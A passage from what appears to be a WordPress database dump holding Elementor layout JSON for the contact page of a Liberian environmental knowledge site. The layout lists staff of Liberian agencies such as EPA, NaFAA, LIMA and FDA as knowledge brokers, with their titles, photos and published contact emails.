nner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23173,3354,'_elementor_edit_mode','builder'),(23174,3354,'_elementor_template_type','wp-page'),(23175,3354,'_elementor_version','3.0.16'),(23176,3354,'_wp_page_template','default'),(23177,3354,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"e